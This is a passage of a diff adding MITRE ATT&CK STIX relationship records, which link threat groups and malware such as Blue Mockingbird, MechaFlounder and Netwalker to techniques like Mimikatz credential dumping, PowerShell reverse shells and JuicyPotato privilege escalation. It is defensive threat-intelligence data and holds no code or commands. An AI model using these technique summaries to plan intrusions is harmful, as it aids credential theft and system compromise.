+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used mofcomp.exe to establish WMI Event Subscription persistence mechanisms configured from a *.mof file.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1a666dc1-d0b9-49ac-b05b-350cfca7fa61",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.704Z",
+ "created": "2020-05-27T15:31:09.473Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used XMRIG to mine cryptocurrency on victim systems.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--8042dc21-37e4-4a60-aef1-457179f346e5",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.709Z",
+ "created": "2020-05-27T15:31:09.486Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used frp, ssf, and Venom to establish SOCKS proxy connections.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--4c26e6e8-8303-44ad-9e5d-452dff52858f",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.806Z",
+ "created": "2020-05-27T15:31:09.497Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used PowerShell reverse TCP shells to issue interactive commands over a network connection.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--06de29d8-365b-4072-a4bb-9d436763ea1e",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.716Z",
+ "created": "2020-05-27T15:31:09.498Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Windows Explorer to manually copy malicious files to remote hosts over SMB.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--bf4d368e-202d-4bd2-9ffe-013ca6104e05",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.812Z",
+ "created": "2020-05-27T15:31:09.501Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Remote Desktop to log on to servers interactively and manually copy files to remote hosts.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--abd46534-2632-4c12-a9c2-06a2a4116f2c",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.933Z",
+ "created": "2020-05-27T15:31:09.530Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used Mimikatz to retrieve credentials from LSASS memory.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--56af2eea-6c9d-4917-b7d9-275877cb552a",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.936Z",
+ "created": "2020-05-27T15:31:09.532Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used JuicyPotato to abuse the SeImpersonate token privilege to escalate from web application pool accounts to NT Authority\\SYSTEM.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--6d3d48ff-ea37-4626-8148-4111163e95e3",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.926Z",
+ "created": "2020-05-27T15:31:09.535Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has masqueraded their XMRIG payload name by naming it wercplsupporte.dll after the legitimate wercplsupport.dll file.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--cc42a6c0-ce7c-442b-8ccc-cb5a9fba3462",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.915Z",
+ "created": "2020-05-27T15:31:09.537Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has made their XMRIG payloads persistent as a Windows Service.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--328e9746-4bb6-47e1-8e71-6418ca04c5fa",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.943Z",
+ "created": "2020-05-27T15:31:09.539Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has collected hardware details for the victim's system, including CPU and memory information.(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--1b9b84cc-f9c7-48c5-8e23-ac00a7a4691a",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.814Z",
+ "created": "2020-05-27T18:25:52.409Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--73a80fab-2aa3-48e0-a4d0-3a4828200aee",
+ "target_ref": "tool--afc079f3-c0ea-4096-b75d-3f05338b7f60",
+ "external_references": [
+ {
+ "source_name": "RedCanary Mockingbird May 2020",
+ "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/",
+ "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "(Citation: RedCanary Mockingbird May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--47e9267e-e84d-43b6-992a-5f42d39c45bb",
+ "type": "relationship",
+ "modified": "2020-06-25T13:59:09.949Z",
+ "created": "2020-05-27T18:25:52.535Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to identify the username and hostname on a compromised host.(Citation: Unit 42 MechaFlounder March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3ef224b5-2edf-41c1-916f-1d80a7dc4ada",
+ "type": "relationship",
+ "modified": "2020-05-27T20:25:33.633Z",
+ "created": "2020-05-27T20:25:33.633Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to use HTTP in communication with C2.(Citation: Unit 42 MechaFlounder March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5ba68c4c-2ac8-4046-bcac-8a7e81e1bdcf",
+ "type": "relationship",
+ "modified": "2020-05-28T13:27:38.702Z",
+ "created": "2020-05-27T20:25:33.655Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to upload and download files to and from a compromised host.(Citation: Unit 42 MechaFlounder March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--b96089fa-ebca-4d3c-9290-473cb98ad577",
+ "type": "relationship",
+ "modified": "2020-05-27T20:25:33.657Z",
+ "created": "2020-05-27T20:25:33.657Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) has been downloaded as a file named lsass.exe, which matches the legitimate Windows file.(Citation: Unit 42 MechaFlounder March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--08057442-4b2c-4841-b351-8813431704e9",
+ "type": "relationship",
+ "modified": "2020-05-28T16:19:14.640Z",
+ "created": "2020-05-27T20:25:33.659Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
+ "external_references": [
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) uses a python-based payload.(Citation: Unit 42 MechaFlounder March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9d4d3bb6-58b7-4c16-a405-d576e8e96c07",
+ "type": "relationship",
+ "modified": "2020-05-28T16:19:14.637Z",
+ "created": "2020-05-27T20:25:33.662Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
+ "target_ref": "malware--e48df773-7c95-4a4c-ba70-ea3d15900148",
+ "external_references": [
+ {
+ "source_name": "ClearSky Charming Kitten Dec 2017",
+ "description": "ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.",
+ "url": "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf"
+ }
+ ],
+ "description": "(Citation: ClearSky Charming Kitten Dec 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--cf9f6e3b-b029-4edd-b53d-7f5981bd2302",
+ "type": "relationship",
+ "modified": "2020-05-27T21:22:18.518Z",
+ "created": "2020-05-27T21:22:18.518Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "target_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90",
+ "external_references": [
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Whitefly](https://attack.mitre.org/groups/G0107) has used [Mimikatz](https://attack.mitre.org/software/S0002) to obtain credentials.(Citation: Symantec Whitefly March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5ee2ba47-9b66-4a62-8bde-ff29409d4830",
+ "type": "relationship",
+ "modified": "2020-05-27T21:56:25.085Z",
+ "created": "2020-05-27T21:56:25.085Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5",
+ "external_references": [
+ {
+ "source_name": "Sophos Netwalker May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used psexec to copy the [Netwalker](https://attack.mitre.org/software/S0457) payload across accessible systems.(Citation: Sophos Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--2dd1c028-bebc-4631-b17b-3dd27a595c00",
+ "type": "relationship",
+ "modified": "2020-05-27T22:05:32.039Z",
+ "created": "2020-05-27T22:05:32.039Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Sophos Netwalker May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used psexec and certutil to retrieve the [Netwalker](https://attack.mitre.org/software/S0457) payload.(Citation: Sophos Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--ed0e96e6-6b71-468a-9e76-477ed3765ca4",
+ "type": "relationship",
+ "modified": "2020-05-27T22:05:32.060Z",
+ "created": "2020-05-27T22:05:32.060Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
+ "external_references": [
+ {
+ "source_name": "Sophos Netwalker May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used psexec and certutil to retrieve the [Netwalker](https://attack.mitre.org/software/S0457) payload.(Citation: Sophos Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--dda9f6bb-eb66-422b-aa58-fede809b6a6a",
+ "type": "relationship",
+ "modified": "2020-05-27T22:05:32.062Z",
+ "created": "2020-05-27T22:05:32.062Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Sophos Netwalker May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "Operators deploying [Netwalker](https://attack.mitre.org/software/S0457) have used batch scripts to retrieve the [Netwalker](https://attack.mitre.org/software/S0457) payload.(Citation: Sophos Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--5ff771c3-7d1c-4d04-a81e-76e374951e72",
+ "type": "relationship",
+ "modified": "2020-05-27T22:05:32.076Z",
+ "created": "2020-05-27T22:05:32.076Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Sophos Netwalker May 2020",
+ "url": "https://news.sophos.com/en-us/2020/05/27/netwalker-ransomware-tools-give-insight-into-threat-actor/",
+ "description": "Szappanos, G., Brandt, A.. (2020, May 27). Netwalker ransomware tools give insight into threat actor. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457)'s PowerShell script can decode and decrypt multiple layers of obfuscation, leading to the [Netwalker](https://attack.mitre.org/software/S0457) DLL being loaded into memory.(Citation: Sophos Netwalker May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--3967e156-2135-4416-b3c3-79372d19d610",
+ "type": "relationship",
+ "modified": "2020-06-08T16:07:36.362Z",
+ "created": "2020-05-27T22:05:32.099Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c",
+ "external_references": [
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to use base16 encoded strings in C2.(Citation: Unit 42 MechaFlounder March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--553dc864-7d6b-41f9-bb1c-9fc6ee3724b7",
+ "type": "relationship",
+ "modified": "2020-05-28T13:54:18.976Z",
+ "created": "2020-05-28T13:27:38.670Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
+ "external_references": [
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to send the compromised user's account name and hostname within a URL to C2.(Citation: Unit 42 MechaFlounder March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--03341b9d-6848-4430-a868-b2bc61b357ba",
+ "type": "relationship",
+ "modified": "2020-05-28T13:54:18.982Z",
+ "created": "2020-05-28T13:27:38.673Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "external_references": [
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "(Citation: Unit 42 MechaFlounder March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--21d94923-38bb-489d-bc6a-23e03fef7b91",
+ "type": "relationship",
+ "modified": "2020-05-28T14:00:25.604Z",
+ "created": "2020-05-28T14:00:25.604Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) has the ability to run commands on a compromised host.(Citation: Unit 42 MechaFlounder March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--80abde96-13dc-4551-9430-d8edddbba216",
+ "type": "relationship",
+ "modified": "2020-05-28T16:19:14.596Z",
+ "created": "2020-05-28T16:19:14.596Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
